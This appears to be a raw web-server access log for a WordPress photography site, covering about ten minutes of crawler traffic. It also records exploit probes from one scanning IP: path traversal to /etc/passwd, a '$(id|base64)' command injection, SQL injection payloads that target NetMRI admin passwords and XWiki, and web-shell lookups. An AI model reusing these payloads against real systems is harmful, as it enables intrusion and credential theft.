157.20.32.210 - - [18/Oct/2025:16:38:05 -0400] "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1" 404 114 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:38:08 -0400] "GET /products194016788?kg=0191650811 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:36:14 -0400] "GET /products234635948?kg=0231774615 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
164.90.241.135 - - [18/Oct/2025:16:36:37 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
46.101.70.221 - - [18/Oct/2025:16:36:37 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
174.138.112.39 - - [18/Oct/2025:16:36:38 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
216.73.216.159 - - [18/Oct/2025:16:36:47 -0400] "GET /products117752410?kg=0116316488 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:36:54 -0400] "GET /products239708828?kg=0236785631 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:37:03 -0400] "GET /products122544864?kg=0121050497 HTTP/1.1" 200 28821 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:37:14 -0400] "GET /products199391610?kg=0196960088 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:37:31 -0400] "GET /products117762906?kg=0116326856 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:37:54 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:37:58 -0400] "GET /membership-registration/ HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
20.171.207.254 - - [18/Oct/2025:16:38:04 -0400] "GET /products60938004?kg=0060194939 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:16:38:29 -0400] "GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
185.61.153.107 - - [18/Oct/2025:16:38:32 -0400] "POST /wp-cron.php?doing_wp_cron=1760819912.3673338890075683593750 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:16:38:48 -0400] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:38:49 -0400] "GET /products34955046?kg=0034528846 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:38:22 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:38:28 -0400] "GET /products40748506?kg=0040251656 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.107 - - [18/Oct/2025:16:38:42 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=105251 HTTP/1.1" 200 29025 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:38:50 -0400] "POST /mbilling/index.php/authentication/login HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.20"
66.249.64.106 - - [18/Oct/2025:16:38:56 -0400] "GET /products12824230?kg=0012667918 HTTP/1.1" 200 29105 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:16:39:04 -0400] "GET /products112019006?kg=0110653002 HTTP/1.1" 200 29506 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.107 - - [18/Oct/2025:16:39:05 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=1478170 HTTP/1.1" 200 28927 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:39:07 -0400] "GET /products146520716?kg=0144733959 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:39:18 -0400] "GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/groups/apikeys%3fogname=Global HTTP/1.1" 404 12361 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1"
157.20.32.210 - - [18/Oct/2025:16:39:23 -0400] "GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/admins/search?status=active%3fogname=Global HTTP/1.1" 404 12355 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
18.213.240.226 - - [18/Oct/2025:16:39:41 -0400] "GET /contact-us/ HTTP/1.1" 200 12440 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
18.214.238.178 - - [18/Oct/2025:16:39:44 -0400] "GET /wp-content/uploads/2019/08/travel-11-h.jpg?998791 HTTP/1.1" 200 1796572 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
98.82.63.147 - - [18/Oct/2025:16:39:44 -0400] "GET /portfolio/this-is-how-you-spend-the-perfect-weekend-2/ HTTP/1.1" 200 16441 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
18.213.240.226 - - [18/Oct/2025:16:39:52 -0400] "GET /wp-content/uploads/2019/08/travel-09-h.jpg?687187 HTTP/1.1" 200 853703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
18.205.91.101 - - [18/Oct/2025:16:39:48 -0400] "GET /portfolio/video-and-audio-subtitles/ HTTP/1.1" 200 16208 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.75.236.148 - - [18/Oct/2025:16:40:00 -0400] "GET /products91262096?kg=0090149225 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.20.32.210 - - [18/Oct/2025:16:40:11 -0400] "POST /api/v1/validate/code HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8 Safari/605.1.15"
20.171.207.254 - - [18/Oct/2025:16:41:15 -0400] "GET /products60891360?kg=0060148865 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:16:41:43 -0400] "GET /products199367252?kg=0196936027 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:41:51 -0400] "GET /?products15272136?kg=0015085973 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:42:05 -0400] "GET /products129197318?kg=0127621822 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:42:13 -0400] "POST /wp-json/sure-triggers/v1/connection/create-wp-connection HTTP/1.1" 404 114 "-" "OttoKit"
20.171.207.254 - - [18/Oct/2025:16:42:16 -0400] "GET /products60921362?kg=0060178500 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
185.61.153.107 - - [18/Oct/2025:16:39:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760819956.1673378944396972656250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:16:39:09 -0400] "GET /products60931166?kg=0060188186 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:16:39:29 -0400] "GET /products48473894?kg=0047882830 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.2.4.213 - - [18/Oct/2025:16:39:36 -0400] "GET /portfolio/outfit-combination-to-wear-on-every-flight/ HTTP/1.1" 200 16536 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:39:44 -0400] "GET /products129179520?kg=0127604241 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.29.160.53 - - [18/Oct/2025:16:39:56 -0400] "GET /wp-content/uploads/2023/04/v-private.jpg?559334 HTTP/1.1" 200 61011 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
91.188.75.80 - - [18/Oct/2025:16:40:01 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
185.61.153.107 - - [18/Oct/2025:16:40:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760820016.9677910804748535156250 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:16:40:12 -0400] "GET /products60900990?kg=0060158378 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:16:40:37 -0400] "GET /products83790962?kg=0082769204 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:40:53 -0400] "GET /webui/application/get_saml_request?saml_id=1%26$(id|%20base64); HTTP/1.1" 404 12361 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13) AppleWebKit/619.4 (KHTML, like Gecko) Version/16.1.13 Safari/619.4"
216.73.216.159 - - [18/Oct/2025:16:40:59 -0400] "GET /products182008640?kg=0179789105 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:41:20 -0400] "POST /wp-cron.php?doing_wp_cron=1760820080.4669249057769775390625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:16:41:17 -0400] "GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=8849 HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:41:26 -0400] "GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f=8849 HTTP/1.1" 404 10906 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:41:37 -0400] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=admin%22+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=%22admin%22),%22password%22,1),CHAR(126)),null)--%22&skipjackPassword=anything&weakPassword=true&eulaAccepted=Accept&mode=DO-LOGIN HTTP/1.1" 404 12361 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Mobile/15E148 Safari/604.1"
185.61.153.107 - - [18/Oct/2025:16:42:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760820136.0734100341796875000000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:16:42:30 -0400] "GET /rest/wikis/xwiki/query?q=where%20doc.name=length(%27a%27)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(7)%20%23%27&type=hql&distinct=0 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:16:42:44 -0400] "GET /portalapi/actuator HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:43:08 -0400] "GET /products196957722?kg=0194555880 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:43:19 -0400] "POST /wp-cron.php?doing_wp_cron=1760820199.5717029571533203125000 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:16:43:27 -0400] "GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1" 404 12359 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:43:27 -0400] "GET /products77517748?kg=0076572491 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:43:36 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=168282 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:43:43 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=66903 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:43:45 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=103519 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.133.172.21 - - [18/Oct/2025:16:43:49 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
66.249.64.105 - - [18/Oct/2025:16:44:04 -0400] "GET /?products16942762?kg=0016736224 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:44:03 -0400] "POST /commandcenter/deployWebpackage.do HTTP/1.1" 404 10852 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.4"
185.61.153.107 - - [18/Oct/2025:16:44:22 -0400] "POST /wp-cron.php?doing_wp_cron=1760820262.3722660541534423828125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:16:44:32 -0400] "POST /web/cgi-bin/usbinteract.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0"
157.20.32.210 - - [18/Oct/2025:16:44:32 -0400] "POST /cgi-bin/usbinteract.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0"
216.73.216.159 - - [18/Oct/2025:16:44:33 -0400] "GET /products78159534?kg=0077206450 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.70.29.56 - - [18/Oct/2025:16:42:45 -0400] "POST /wp-login.php HTTP/1.1" 200 6564 "-" "Mozilla/5.0"
216.73.216.159 - - [18/Oct/2025:16:42:46 -0400] "GET /products186506790?kg=0184232398 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:16:43:17 -0400] "GET /products60917636?kg=0060174819 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
13.40.66.20 - - [18/Oct/2025:16:43:32 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
206.189.247.132 - - [18/Oct/2025:16:43:32 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
66.249.64.105 - - [18/Oct/2025:16:43:50 -0400] "GET /categories/12150142 HTTP/1.1" 200 29279 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:43:49 -0400] "GET /products208008744?kg=0205472133 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
138.68.166.157 - - [18/Oct/2025:16:43:53 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
20.171.207.254 - - [18/Oct/2025:16:44:17 -0400] "GET /products60883642?kg=0060141240 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.105 - - [18/Oct/2025:16:44:50 -0400] "GET /?products121869762?kg=0120383628 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:44:55 -0400] "GET /products158717282?kg=0156781788 HTTP/1.1" 404 9733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:16:45:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760820315.1698439121246337890625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
20.171.207.254 - - [18/Oct/2025:16:45:21 -0400] "GET /products60917718?kg=0060174902 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:16:45:28 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0"
216.73.216.159 - - [18/Oct/2025:16:45:36 -0400] "GET /products153893258?kg=0152016592 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:16:45:41 -0400] "GET /products7270084?kg=0007181507 HTTP/1.1" 200 31624 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:16:45:58 -0400] "GET /products199363940?kg=0196932755 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:16:46:10 -0400] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.64.105 - - [18/Oct/2025:16:44:44 -0400] "GET /?products13984148?kg=0013813691 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:16:45:01 -0400] "GET /?products6489020?kg=0006409967 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.20.32.210 - - [18/Oct/2025:16:45:09 -0400] "GET /unified-console.html HTTP/1.1" 404 10903 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15"
51.178.9.114 - - [18/Oct/2025:16:45:13 -0400] "GET /wp-login.php HTTP/1.1" 200 2082 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; EIE10;ENUSMSE; rv:11.0) like Gecko"
51.178.9.114 - - [18/Oct/2025:16:45:15 -0400] "POST /wp-login.php HTTP/1.1" 200 2174 "https://salhab360photos.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; EIE10;ENUSMSE; rv:11.0) like Gecko"
185.61.153.107 - - [18/Oct/2025:16:46:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760820375.9677870273590087890625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
157.20.32.210 - - [18/Oct/2025:16:46:16 -0400] "POST /menu.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:46:18 -0400] "GET /cache_public/sh.phtml HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
176.31.139.25 - - [18/Oct/2025:16:46:18 -0400] "GET /products68016822?kg=0067187430 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
157.20.32.210 - - [18/Oct/2025:16:46:29 -0400] "GET /cache_public/sh.php HTTP/1.1" 404 10905 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:16:48:11 -0400] "POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1" 400 21 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
